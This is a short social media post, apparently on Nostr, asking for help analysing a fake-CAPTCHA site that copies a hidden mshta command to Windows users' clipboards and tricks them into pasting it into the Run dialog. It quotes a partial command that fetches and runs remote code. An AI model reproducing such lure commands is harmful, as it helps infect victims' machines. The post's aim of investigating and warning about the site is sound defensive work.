Can anybody on Nostr do malware analysis in the wild?

This website shows a fake CAPTCHA only for Windows users. The CAPTCHA tricks the user into hitting Win + R and Ctrl + V to paste a seemingly innocent looking verification ID into the run console which the website already copied to the user's clipboard upon visiting the site. It's easily missed that part of the pasted string is not visible and actually runs "mshta .icu/gkcxv.google?i=" that executes arbitrary code on the victim's machine.

The source code of the website has a heavily obfuscated script which seems to fetch and construct a payload that is eventually executed using eval() without any user input upon visiting the site. The site also seems to store some data to Ethereum smart contracts every few seconds for some reason.

I'm trying to figure out what the stage 2 mshta payload actually does and does the site actually run something with the mshta utility that can escape the browser sandbox. The payload is fetched from some very short-lived command & control servers so it's hard to scrape the payload code directly. Does someone have the expertise to investigate this?

The *malicious* website: